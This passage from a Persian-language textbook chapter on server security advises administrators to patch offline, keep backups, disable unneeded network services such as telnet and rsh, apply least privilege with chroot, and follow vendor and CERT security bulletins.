‫ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺎﻳﺪ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﻄﻊ ﻛﻨﻴﺪ ﻭ ﺗﺎ ﺗﻤﺎﻡ ﺷﺪﻥ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻜﻨﻴﺪ‪ ،‬ﺍﻣﺎ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺪﻭﻥ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺳﺨﺖﺗﺮ ﻣﻲﺷـﻮﺩ‪ .‬ﻣـﻮﺍﺭﺩ ﺯﻳـﺎﺩﻱ ﮔـﺰﺍﺭﺵ‬
‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﭘﻴﺶ ﺍﺯ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﺍﺯ ﻣﺘﺼﻞ ﻧﺒﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻄﻤﺌﻦ ﺷﺪﻳﺪ‪ ،‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ‬
‫ﺍﺭﺗﻘﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ .‬ﺗﻤﺎﻡ ﺍﻋﻤﺎﻝ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﻓﺘﺮﭼﻪﺍﻱ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﺩﺳﺘﺮﺳﺘﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺑـﻪ ﺛﺒـﺖ ﺑﺮﺳـﺎﻧﻴﺪ‪ .‬ﭼﻨـﻴﻦ ﺛﺒﺘﻬـﺎﻳﻲ‬
‫ﺧﺼﻮﺻﹰﺎ ﺯﻣﺎﻧﻲ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﻭ ﻣﺎﻳـﻞ ﺑﺎﺷـﻴﺪ ﺭﻭﺯﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﻪ‬
‫ﺩﻳﮕﺮﺍﻥ ﻭﺍﮔﺬﺍﺭﻳﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﻫﻤﺔ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻭ ﭘﻴﺶ ﺍﺯ ﺍﻧﺠﺎﻡ ﻫﺮ ﻛﺎﺭ ﺩﻳﮕﺮ‪ ،‬ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ‪ .‬ﺍﮔـﺮ ﭘـﻴﺶ ﺍﺯ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻣﺮﺣﻠﻪ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻤﺎﻡ ﺍﺭﺯﺵ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ‪.‬‬
‫ﻲ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﭘﺲ ﺍﺯ ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﻭﻡ ﺭﺍ‬
‫ﭘﺲ ﺗﻬﻴﺔ ﺍﻭﻟﻴﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮﮔﻮﻧﻪ ﺗﻨﻈﻴﻤﺎﺕ ﺍﺧﺘﺼﺎﺻ ﹺ‬
‫ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﺓ ﻣﺘﻔﺎﻭﺕ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﻣﺤﻠﻲ ﺍﻣﻦ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧـﺪ؛ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ‬
‫ﺭﺍﻳﺎﻧﻪ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺩﺍﺭﻳﺪ ﺗﺎ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺩﺭ‬
‫ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻛﻮﺗﺎﻫﻲ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﺍﺭﺩ‪ ،‬ﺑﺮﺍﻱ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ‪.‬‬

‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﻫﺶ ﺧﺪﻣﺎﺕ‬


‫ﻳﻚ ﺭﻭﺵ ﻣﻬﻢ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﻣﺨﺎﻃﺮﺍﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﺣﺪﺍﻗﻞ ﻛﺮﺩﻥ ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮﻱ ﺍﺳـﺖ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺭﺍﺋـﻪ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﻪ ﺳﺮﻭﻳﺴﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻳﺪ‪ ،‬ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺑﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛـﺮﺩﻥ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ‪،‬‬
‫ﺭﺍﻫﻬﺎﻱ ﺑﺎﻟﻘﻮﺓ ﻧﻔﻮﺫ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻣﻴﺎﻥ ﺑﺮﺩﺍﺷﺘﻪﺍﻳﺪ‪ .‬ﺑﺮﺍﻱ ﺭﻋﺎﻳﺖ ﺩﻗﻴﻘﺘﺮ ﺍﻳﻦ ﺍﺻﻞ‪ ،‬ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ‬
‫ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺗﻮﺯﻳﻊ ﻛﻨﻴﺪ‪ :‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﺎﻳﻞ‪ ،‬ﻭ ﻏﻴﺮﻩ‪.‬‬
‫ﺑﺎﻳﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻏﻴﺮﻓﻌﺎﻝ ﺑﻮﺩﻥ ﺑﺮﺧﻲ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻣﺜـﻞ ‪ systat ،netstat ،finger‬ﻭ ‪ rwho‬ﺭﺍ ﻛﻨﺘـﺮﻝ ﻛﻨﻴـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻣﺜﻞ ‪ chargen‬ﻭ ‪ echo‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ ﺑﻜـﺎﺭ‬
‫ﺭﻭﻧﺪ‪ .‬ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﻧﺸﺪﻩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ‪ -‬ﻣﺜﻞ ‪ telnet‬ﻭ ‪) FTP‬ﻏﻴـﺮ ﺍﺯ ‪ FTP‬ﻧﺎﺷـﻨﺎﺱ‪ - (١٩٩‬ﺭﺍ‬
‫ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﺩﺭﺱ ‪ IP‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﻣﺜﻞ ‪ rlogin‬ﻭ ‪ - rsh‬ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ ﻫﻤﮕـﻲ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻭ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻳﻤﻦﺗﺮ ﻣﺜﻞ ‪ ssh‬ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ ﺟﺎﻳﮕﺰﻳﻦ ﺷﻮﻧﺪ‪.‬‬
‫ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Unix‬ﺑﺴﺎﺩﮔﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺑﺎ ﺣﺬﻑ ﺧﻄﻮﻁ ﻣﺘﻨـﺎﻇﺮ ﺩﺭ ﻓﺎﻳـﻞ ‪ inetd.conf‬ﻣﺤـﺪﻭﺩ ﻛﻨﻴـﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺼﻮﺭﺕ ‪daemon‬ﻫﺎﻱ ﻣﺠﺰﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﻨﺪ )ﻣﺜ ﹰﻼ ‪ (portmapper‬ﺭﺍ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ "‪ "rc‬ﻛـﻪ ﺩﺭ ﻣـﺴﻴﺮ‬
‫‪ /etc/rc‬ﻭ ‪ /etc/rc.local‬ﻭ ﺯﻳﺮﺷﺎﺧﻪﻫﺎﻱ ﻓﺮﻋﻲ ‪ ،/etc/init.d ،/etc/rc.d‬ﻭ ‪ /usr/local/etc/rc.d‬ﻳﺎﻓﺖ ﻣﻲﺷـﻮﺩ ﺣـﺬﻑ ﻛـﺮﺩ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪wrapper‬ﻫﺎﻱ ‪ TCP‬ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ‬
‫ﺧﺪﻣﺎﺕ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺧﺪﻣﺎﺕ ‪ IP‬ﺭﻭﻱ ‪ Windows NT‬ﻳﺎ ‪ Windows 2000‬ﻛﻤﻲ ﺩﺷﻮﺍﺭﺗﺮ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺗﻨﻈﻴﻤـﺎﺕ ﻣﺨﺘﻠـﻒ ﺩﺭ ﺳﺮﺍﺳـﺮ‬
‫‪ registry‬ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﻧﻴﺰ ﺑﺪﻟﻴﻞ ﻃﺒﻴﻌﺖ ‪ Windows NT‬ﻫﻤﻮﺍﺭﻩ ﺑﺎﻳﺪ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧـﺪﻣﺎﺕ ‪ NT‬ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﻛﻨﺘﺮﻝ ﺧﺪﻣﺎﺕ ‪ NT‬ﻣﻤﻴﺰﻱ ﻛﺮﺩ ﻳﺎ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ‪ .‬ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NT‬ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﻓﻬﺮﺳﺖ‬

‫‪199 Anonymous FTP‬‬


‫‪٣٥٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺶﺳﺎﺧﺘﻪ‪ ٢٠٠‬ﻫﻤﺮﺍﻩ ﻫﺴﺘﻨﺪ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻛﻠﻴﺔ ﺗﺮﺍﻓﻴﻚ ﻳﻚ ﻳﺎ ﭼﻨـﺪ ﭘـﻮﺭﺕ ﻣـﻮﺭﺩ ﻧﻈـﺮ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﻫﻤﺎﻥ ﻧﺘﺎﻳﺠﻲ ﺑﺮﺳﻴﺪ ﻛﻪ ﺑﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲ ﺑﻪ ﺁﻥ ﻣﻲﺭﺳﻴﺪﻳﺪ‪) .‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ ﻗـﺴﻤﺖ ﺗﻨﻈﻴﻤـﺎﺕ‬
‫ﭘﻴﺸﺮﻓﺘﺔ ‪ TCP/IP‬ﺩﺭ ‪ ،Control Panel‬ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ‪ IP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪(.‬‬
‫ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺧﺪﻣﺎﺕ‪ ،‬ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﺁﻧﻬﺎ ﻻﺯﻡ ﻧﻴﺴﺖ‬
‫ﺍﺯ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ‪ administrator‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ ،‬ﻧﺒﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻭ ﺩﺭﻋـﻮﺽ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺑﻪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﻳﻦ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﮔﺮﺩﻧـﺪ‪ .‬ﺩﺭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ‪ ،‬ﻫﺮ ﭘﺮﺩﺍﺯﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺎ ﮔﺮﻭﻩ ﻭ ‪ uid‬ﺧﻮﺩﺵ ﺍﺟﺮﺍ ﮔﺮﺩﺩ‪ .‬ﺍﮔﺮ ﺑﺘﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺩﺭ ﻗـﺴﻤﺖ ﻛـﻮﭼﻜﻲ‬
‫ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩ‪ ،‬ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ )(‪ chroot‬ﻳﺎ )(‪.(jail‬‬

‫ﺁﮔﺎﻩ ﺑﻮﺩﻥ ﺍﺯ ﺁﺧﺮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳﺪ‬


‫ﺍﻣﺮﻭﺯ ﺷﺮﺍﻳﻂ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺍﻳﻤﻦ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺭﺍﻫﺒﺮﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻤﺎﻳﻴـﺪ ﻻﺯﻡ ﺍﺳـﺖ ﺍﺯ ﺟﺰﺋﻴـﺎﺕ‬
‫ﻻ ﺑـﺎ ﺳـﺮﻋﺖ ﻓـﻮﻕﺍﻟﻌـﺎﺩﻩﺍﻱ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺘﺎﺯﮔﻲ ﻛﺸﻒ ﺷﺪﻩﺍﻧﺪ ﻣﻄﻠﻊ ﺑﺎﺷﻴﺪ‪ .‬ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺸﻒ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻴﺎﻥ ﻋﻤﻮﻡ ﻣﻨﺘﺸﺮ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪ‪ ،‬ﺭﻭﺷﻬﺎ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻥ ﻧﻴﺰ‬
‫ﺑﺴﺮﻋﺖ ﺗﻮﻟﻴﺪ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ‪ ،‬ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺍﺯ ﺯﻣﺎﻧﻴﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑـﺮﺍﻱ ﺍﻭﻟـﻴﻦﺑـﺎﺭ ﺍﻧﺘـﺸﺎﺭ‬
‫ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺗﻨﻬﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻓﺮﺻﺖ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻫﻤﻴﺸﻪ ﺣﺪﺍﻗﻞ ﻳﻚ ﻧﮕﺎﻩ ﮔﺬﺭﺍ ﺑﻪ ﺁﺧﺮﻳﻦ ﺑﻮﻟﺘﻨﻬﺎﻱ ﻣﻨﺘﺸﺮﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﻭ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎﻱ ﻣﺮﺗﺒﻂ‬
‫ﺑﺎ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ ﻧﺼﺐ ﻛﻨﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺨـﺼﻮﺹ‬
‫‪٢٠١‬‬
‫ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﻨﺒﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﻧﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻨﺒﻊ ﺩﻳﮕـﺮﻱ ﺑـﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺗﻴﻤﻬـﺎﻱ ‪FIRST‬‬
‫ﻫﺴﺘﻨﺪ؛ ﻣﺜﻞ ﻣﺮﻛﺰ ﻫﻤﺎﻫﻨﮕﻴﻬﺎﻱ ﮔﺮﻭﻩ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ )‪ ٢٠٢(CERT/CC‬ﺩﺭ ﻣﺆﺳﺴﻪ ﻣﻬﻨﺪﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﻧـﺸﮕﺎﻩ ﻛـﺎﺭﻧﻲ‬
